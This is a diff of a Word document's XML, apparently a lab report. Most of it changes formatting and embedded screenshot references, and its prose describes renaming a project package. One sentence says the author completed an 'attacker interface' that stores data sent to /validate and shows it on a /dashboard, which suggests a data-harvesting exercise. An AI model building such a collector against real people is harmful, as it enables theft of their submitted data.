+        <w:t xml:space="preserve">I also refactored the codebase a little by renaming the project name. Therefore, I had to update the package name at a lot of different places to ensure it works.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -152,19 +147,6 @@
         <w:rPr>
           <w:highlight w:val="none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r/>
-      <w:r>
-        <w:t xml:space="preserve">I also refactored the codebase a little by rename the project name.</w:t>
-      </w:r>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -245,6 +227,24 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I just changed that and attempted but that didn’t work. So, I went ahead and basically updated that name in everywhere I could find it at.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="none"/>
@@ -261,48 +261,17 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2973645"/>
+                <wp:extent cx="5396885" cy="2340102"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="3" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -325,7 +294,7 @@
                       <pic:spPr bwMode="auto">
                         <a:xfrm rot="0" flipH="0" flipV="0">
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2973643"/>
+                          <a:ext cx="5396885" cy="2340102"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -358,7 +327,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i2" o:spid="_x0000_s2" type="#_x0000_t75" style="width:540.00pt;height:234.15pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i2" o:spid="_x0000_s2" type="#_x0000_t75" style="width:424.95pt;height:184.26pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId11" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -367,97 +336,26 @@
         </mc:AlternateContent>
       </w:r>
       <w:r/>
-      <w:r/>
-      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
+        <w:jc w:val="left"/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
       <w:r>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wpg">
-            <w:drawing>
-              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2982102"/>
-                <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="4" name=""/>
-                <wp:cNvGraphicFramePr>
-                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                </wp:cNvGraphicFramePr>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:nvPicPr>
-                        <pic:cNvPr id="1508562522" name=""/>
-                        <pic:cNvPicPr>
-                          <a:picLocks noChangeAspect="1"/>
-                        </pic:cNvPicPr>
-                        <pic:nvPr/>
-                      </pic:nvPicPr>
-                      <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId12"/>
-                        <a:stretch/>
-                      </pic:blipFill>
-                      <pic:spPr bwMode="auto">
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2982102"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                      </pic:spPr>
-                    </pic:pic>
-                  </a:graphicData>
-                </a:graphic>
-              </wp:inline>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
-                <v:stroke joinstyle="miter"/>
-                <v:formulas>
-                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
-                  <v:f eqn="sum @0 1 0"/>
-                  <v:f eqn="sum 0 0 @1"/>
-                  <v:f eqn="prod @2 1 2"/>
-                  <v:f eqn="prod @3 21600 pixelWidth"/>
-                  <v:f eqn="prod @3 21600 pixelHeight"/>
-                  <v:f eqn="sum @0 0 1"/>
-                  <v:f eqn="prod @6 1 2"/>
-                  <v:f eqn="prod @7 21600 pixelWidth"/>
-                  <v:f eqn="sum @8 21600 0"/>
-                  <v:f eqn="prod @7 21600 pixelHeight"/>
-                  <v:f eqn="sum @10 21600 0"/>
-                </v:formulas>
-                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
-                <o:lock v:ext="edit" aspectratio="t"/>
-              </v:shapetype>
-              <v:shape id="_x0000_i3" o:spid="_x0000_s3" type="#_x0000_t75" style="width:540.00pt;height:234.81pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId12" o:title=""/>
-                <o:lock v:ext="edit" rotation="t"/>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I also renamed the web package name in project properties as well as I updated everything manually.</w:t>
       </w:r>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
       <w:r/>
       <w:r/>
       <w:r/>
@@ -469,99 +367,6 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wpg">
-            <w:drawing>
-              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="3521222"/>
-                <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="5" name=""/>
-                <wp:cNvGraphicFramePr>
-                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                </wp:cNvGraphicFramePr>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:nvPicPr>
-                        <pic:cNvPr id="475305568" name=""/>
-                        <pic:cNvPicPr>
-                          <a:picLocks noChangeAspect="1"/>
-                        </pic:cNvPicPr>
-                        <pic:nvPr/>
-                      </pic:nvPicPr>
-                      <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId13"/>
-                        <a:stretch/>
-                      </pic:blipFill>
-                      <pic:spPr bwMode="auto">
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="6857999" cy="3521222"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                      </pic:spPr>
-                    </pic:pic>
-                  </a:graphicData>
-                </a:graphic>
-              </wp:inline>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
-                <v:stroke joinstyle="miter"/>
-                <v:formulas>
-                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
-                  <v:f eqn="sum @0 1 0"/>
-                  <v:f eqn="sum 0 0 @1"/>
-                  <v:f eqn="prod @2 1 2"/>
-                  <v:f eqn="prod @3 21600 pixelWidth"/>
-                  <v:f eqn="prod @3 21600 pixelHeight"/>
-                  <v:f eqn="sum @0 0 1"/>
-                  <v:f eqn="prod @6 1 2"/>
-                  <v:f eqn="prod @7 21600 pixelWidth"/>
-                  <v:f eqn="sum @8 21600 0"/>
-                  <v:f eqn="prod @7 21600 pixelHeight"/>
-                  <v:f eqn="sum @10 21600 0"/>
-                </v:formulas>
-                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
-                <o:lock v:ext="edit" aspectratio="t"/>
-              </v:shapetype>
-              <v:shape id="_x0000_i4" o:spid="_x0000_s4" type="#_x0000_t75" style="width:540.00pt;height:277.26pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId13" o:title=""/>
-                <o:lock v:ext="edit" rotation="t"/>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
-      </w:r>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
@@ -569,7 +374,7 @@
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                 <wp:extent cx="6858000" cy="2019699"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="6" name=""/>
+                <wp:docPr id="4" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -584,7 +389,7 @@
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId14"/>
+                        <a:blip r:embed="rId12"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
@@ -623,8 +428,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i5" o:spid="_x0000_s5" type="#_x0000_t75" style="width:540.00pt;height:159.03pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId14" o:title=""/>
+              <v:shape id="_x0000_i3" o:spid="_x0000_s3" type="#_x0000_t75" style="width:540.00pt;height:159.03pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId12" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -632,11 +437,6 @@
         </mc:AlternateContent>
       </w:r>
       <w:r/>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -645,10 +445,6 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
@@ -656,7 +452,7 @@
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                 <wp:extent cx="6858000" cy="1453896"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="7" name=""/>
+                <wp:docPr id="5" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -671,7 +467,7 @@
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId15"/>
+                        <a:blip r:embed="rId13"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
@@ -710,8 +506,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i6" o:spid="_x0000_s6" type="#_x0000_t75" style="width:540.00pt;height:114.48pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId15" o:title=""/>
+              <v:shape id="_x0000_i4" o:spid="_x0000_s4" type="#_x0000_t75" style="width:540.00pt;height:114.48pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId13" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -719,17 +515,16 @@
         </mc:AlternateContent>
       </w:r>
       <w:r/>
-      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
@@ -737,7 +532,7 @@
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                 <wp:extent cx="6858000" cy="2142845"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="8" name=""/>
+                <wp:docPr id="6" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -752,7 +547,7 @@
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId16"/>
+                        <a:blip r:embed="rId14"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
@@ -791,26 +586,67 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i7" o:spid="_x0000_s7" type="#_x0000_t75" style="width:540.00pt;height:168.73pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId16" o:title=""/>
+              <v:shape id="_x0000_i5" o:spid="_x0000_s5" type="#_x0000_t75" style="width:540.00pt;height:168.73pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId14" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r/>
-      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
@@ -818,7 +654,7 @@
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                 <wp:extent cx="6858000" cy="3661552"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="9" name=""/>
+                <wp:docPr id="7" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -833,7 +669,7 @@
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId17"/>
+                        <a:blip r:embed="rId15"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
@@ -872,8 +708,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i8" o:spid="_x0000_s8" type="#_x0000_t75" style="width:540.00pt;height:288.31pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId17" o:title=""/>
+              <v:shape id="_x0000_i6" o:spid="_x0000_s6" type="#_x0000_t75" style="width:540.00pt;height:288.31pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId15" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -881,7 +717,6 @@
         </mc:AlternateContent>
       </w:r>
       <w:r/>
-      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -890,8 +725,6 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
@@ -899,7 +732,7 @@
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                 <wp:extent cx="6858000" cy="4128267"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="10" name=""/>
+                <wp:docPr id="8" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -914,7 +747,7 @@
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId18"/>
+                        <a:blip r:embed="rId16"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
@@ -953,8 +786,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i9" o:spid="_x0000_s9" type="#_x0000_t75" style="width:540.00pt;height:325.06pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId18" o:title=""/>
+              <v:shape id="_x0000_i7" o:spid="_x0000_s7" type="#_x0000_t75" style="width:540.00pt;height:325.06pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId16" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -962,6 +795,15 @@
         </mc:AlternateContent>
       </w:r>
       <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
       <w:r/>
     </w:p>
     <w:p>
@@ -980,29 +822,74 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I also updated all the source code to complete the attacker interface. It will now store the data sent to /validate in a list and display it in /dashboard.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2931574"/>
+                <wp:extent cx="6858000" cy="3269210"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="11" name=""/>
+                <wp:docPr id="9" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -1010,20 +897,20 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="1881021264" name=""/>
+                        <pic:cNvPr id="860454286" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId19"/>
+                        <a:blip r:embed="rId17"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2931573"/>
+                          <a:ext cx="6858000" cy="3269210"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1056,7 +943,260 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i10" o:spid="_x0000_s10" type="#_x0000_t75" style="width:540.00pt;height:230.83pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i8" o:spid="_x0000_s8" type="#_x0000_t75" style="width:540.00pt;height:257.42pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId17" o:title=""/>
+                <o:lock v:ext="edit" rotation="t"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wpg">
+            <w:drawing>
+              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="6858000" cy="3282420"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="10" name=""/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="1556347669" name=""/>
+                        <pic:cNvPicPr>
